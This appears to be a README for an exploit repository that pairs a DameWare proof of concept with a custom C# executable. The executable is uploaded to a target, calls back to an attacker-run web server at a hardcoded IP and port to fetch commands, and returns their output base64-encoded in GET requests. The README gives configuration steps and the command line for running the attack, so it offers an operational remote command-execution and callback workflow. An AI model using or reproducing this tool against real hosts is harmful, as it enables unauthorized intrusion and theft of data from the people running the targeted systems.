This repo was created to utilize the Nessus POC with a custom C# executable to run commands on a remote host and get the output of the command.
The python file is used to start a web server, execute the exploit, and then get the results over the web server.
The C# exe is uploaded through the exploit to the target.
When executed on thte target, the exe calls back to the IP/Port specified to get the command to run (path is /cmd).
Once the command finishes, the exe sends the output to the same webserver.
Sending the output is done through a GET request that will generate a 404, but thats fine we just want the base64 data.
C# exe has two variables that need to be updated
These variables reference the attacking systems IP and Port
string ip = "10.8.0.3";
string port = "8000";
--if port is updated, python script needs to be updated as well, variable to server the HTTP server is below in python script PORT = 8000
Wherever script is launched from needs to contain the file uploaded and well as file called "cmd" which contains the windows commands you want to run.
To use this script:
Update variables
create cmd file with commands to run on vulnerable host
compile c# solution contained in zip file
run python script:
python dameware-poc.py -t target_ip -e executable_to_upload